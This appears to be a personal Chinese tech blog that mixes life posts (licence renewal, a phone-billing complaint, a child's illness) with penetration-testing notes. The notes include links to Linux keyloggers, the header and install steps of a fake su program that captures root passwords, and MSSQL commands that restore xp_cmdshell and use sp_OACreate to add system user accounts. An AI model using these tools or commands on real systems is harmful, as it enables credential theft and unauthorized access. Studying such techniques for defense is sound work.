simeon技术专栏

伯克利和斯坦福合作的在线安全课程
在线注册 http://www.security-class.org
注册很简单，输入用户名和邮箱即可。
然后登陆邮箱查看邮件，就会看到如下信息：
Dear simeon,
Thank you for signing up for the Computer Security online class (http://www.security-class.org). The class will start in February 2012, and we will contact you again via email before the class starts.
Feel
free to forward this email to your friends who might be interested in
Computer Security or any of the other classes offered.
See you in class in February 2012!
Dan Boneh, John Mitchell and Dawn Song
Computer Security
If
you do not wish to receive any more information from us, or if you have
received this email in error, please send an email to staff+unsubscribe@free-class.org to unsubscribe.

初步课表 http://www.cs.berkeley.edu/~dawnsong/teaching/s12-cs161/syllabus.html

下载wubi.exe，傻瓜式安装ubuntu，linux与windows共享操作系统，实在是菜鸟学写的好东东。下载地址：
http://www.ubuntu.com/download/ubuntu/windows-installer

     从今天开始准备职称英语考试，最高难度的考试，好久没有看英语了，感觉有些生疏，既然报名了就要认真准备。推荐一个好工具软件，互动英语学习大师，阅读加练习，还有互动网站。http://home.hudong100.com/home.php

http://www.51testing.com/?uid-227476-action-viewspace-itemid-99651

找到一个安装Lamp的linux版本文章。http://www.lamphowto.com/

http://code.google.com/p/logkeys/downloads/detail?name=logkeys-0.1.1a.tar.gz&can=2&q=

http://sourceforge.net/projects/lkl/files/latest/download?source=files

查看 内核版本的命令：
uname -a 查看服务器的内核等信息
uname -r 查看内核的实际版本
 lsb_release -a 显示lsb的版本等信息
cat /proc/version
cat /etc/issuse

风云变幻的2011（年度总结）
http://blog.sina.com.cn/s/blog_4b02a21a0102e1pb.html

 从网上找到的几个Linux下的键盘记录文件，未做测试，分享出来，仅供学习研究使用。

 （1）驾照6年更换一次，在驾照注明的90天内进行更换。
（2）更换地点跟发照的地方有关。区域进行更换
（3）需要准备3张1寸个人彩色照片。
（4）四点以前过去，当天就能取证。
（5）携带身份证复印件1份。
（6）需要进行体检。

 

北京市公安局公安交通管理局车辆管理所
地址：南四环东路18号
电话：(010)87625123, (010)87625155, (010)87625122



 
 


 

 

 

丰台区京丰车管所
地址：北京市丰台区小屯路西南坟248号
电话：(010)68636331



 
 


 

 

 

大兴区京南车管所
地址：北京市大兴区黄村镇狼垡村公交考试场内
电话：010-83701853



 
 


 

 

 

北京市公安局门头沟分局交警支队车辆管理所
地址：滨河路72号



 
 


 

 

 

    今天查电话费时，感觉电话费增加不少，以前电话费不是很高。采用联通快带捆绑业务1680元/年上网套餐后，说是给增加两个免费用的电话号码，其实就是一个陷阱。通过跟客服沟通，终于知道直接也被强扣费，号码为11616666，为北京新推出的Q吧业务，现在网络这么发达，谁还会用电话去聊天，简直就是电话“黑道”，取消绑定还很难，给他们客服打电话过去，二句话没有说完，一听是退订的，就直接挂掉了。真厉害！实在没有办法就反复投诉10010，已经把意见反馈上去，希望能够得到解决，从网上搜索情况来看，还有很多其他朋友也遇到这种情况。很是讨厌和扫兴，明年不打算这个宽带了。
     真希望有途径能够治理他们！希望使用电话或者这种业务的朋友要注意了，定期了解自己的电话费用还是很有必要的。现在这个社会，真是难以相信！
 

       一段时间，以为自己忘却了，真正自己付出的东西，怎么能够忘却呢。工作、家庭事情太多，导致没有太多时间来写blog，虽然来的少，但这一年过的很充实。回顾这一年，虽然很累，但所获很多：
（1）熟悉SQL Server 2008数据库
（2）熟悉Windows 2008 操作系统。
（3）接触大型网络架构
（4）对渗透技术有了更深的理解。
（5）完成暂时命名为“Web渗透技术”图书的编写，该书正在由编辑进行校对，预计明年出版。
（6）换了一套大房子。
（7）挖掘了一些网站系统的漏洞。对Mysql数据库有了跟亲密的接触。
一年时间，看起来很长，实际很短，有了小孩以后，才知道生活不是想象中的那么简单，小孩的健康，小孩的成长，家庭关系，很多事情都需要处理，不过这一切都过来了。最近小孩的眼睛长了霰粒肿，很是头疼，想了很多方子，最主要原因就是上火，也行是由于我和老婆工作太忙，忽略了小孩，很多事情都是有代价的，有得就有失去。
     总之这一年很充实，见证了自己的成长，见证了奸商，见证了很多事情，我相信明年会更好，明年我会更加努力的去做自己喜欢的事情。

记录su root帐号
#include <stdio.h>

#include <unistd.h>

#include <stdlib.h>

#include <string.h>

#include <sys/types.h>

#include <sys/stat.h>



/*



   [ fakesu.c ] 2oo6 by OOZIE <oozie[at]poczta.fm>

   ~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

  

   Simple /bin/su fake-proggy. Very useful if you have a shell

   with regular user rights, who uses from time to time su/sux/sudo

   to become a superuser.

  

   INSTALL

   ~~~~~~~

   If you can find ~/bin directories (e.g. SUSE Linux 10.1) which are

   located at the beginning of $PATH variable (EXTREMELY BAD IDEA!)

   in this case nothing simpler as:

  

   gcc fakesu.c -o ~/bin/su

   ln -s ~/bin/su ~/bin/sux     # just to be sure

   ln -s ~/bin/su ~/bin/sudo ..

http://www.vulnerabilityassessment.co.uk 渗透测试框架

    宝宝眼睛上面长了霰粒肿，已经去过儿童医院两次，每一次的感觉都很沉重，感觉这些医生麻木和漠视，对小孩眼睛上长了霰粒肿，最直接的方法就是做手术，上次给小孩做术前检查，抽取静脉血，看到小孩哭的真心疼。如果是全身麻醉做手术，都知道或多或少会对小孩有影响，毕竟小孩太小了。
     恳求曾经得过霰粒肿，有过治疗经验的朋友分享自己的经验。

http://www.exploit-db.com/papers/17934/
老外写的一篇Paper，挺不错的。

     51cto好多老人都走了，老杨，还有好多人。。。。。。，铁打的营盘，流水的兵。有小孩了，工作比较忙，所以来的时间少了。其实还有一个原因，没有从前的感觉了。对51cto说不上好，也说不上不好。或许还是该留下一些学习的记忆。
   新书快写完了，算是对过去的一些总结，有很多收获，有很多体会。生活就是向前进。以前自己写的目标，也算实现了一些。51cto有些技术还是值得学习的。

　　一 系统Shell




　　恢复xp_cmdshell




　　Exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'




　　使用xp_cmdshell添加用户




　　exec xp_cmdshell 'net user user1 /add'




　 　利用OLE对象接口，SQL SERVER提供了一些函数访问OLE对象，分别是sp_OACREATE和sp_OAMethod,可以利用他们调用OLE控件，间接获取一个 shell。使用SP_OAcreate调用对象wscript。shell赋给变量@shell，然后使用SP_OAMETHOD调用@shell的属 性run执行命令。




　　DECLARE @shell INT




　　EXEC SP_OAcreate 'wscript.shell',@shell out




　　EXEC SP_OAMETHOD @shell,'run',null, 'net user ray ray /add'




　 　declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user temp zyi /add'--




　　二 数据库查询




　　查询库




　　库名称存在master库中的sysdatabases表中，sysdatabases表中的 dbid字段的值大于6的就是用户自己建的库




　　Select name FROM sysdatabases where dbid>6




　　查询..

今天调试一个cms程序，数据库采用access数据库，iis设置成功后，报错80040e09，说数据库只读。处理办法是给该数据库iis_user的写入权限，即选中数据库文件，然后设置安全选项。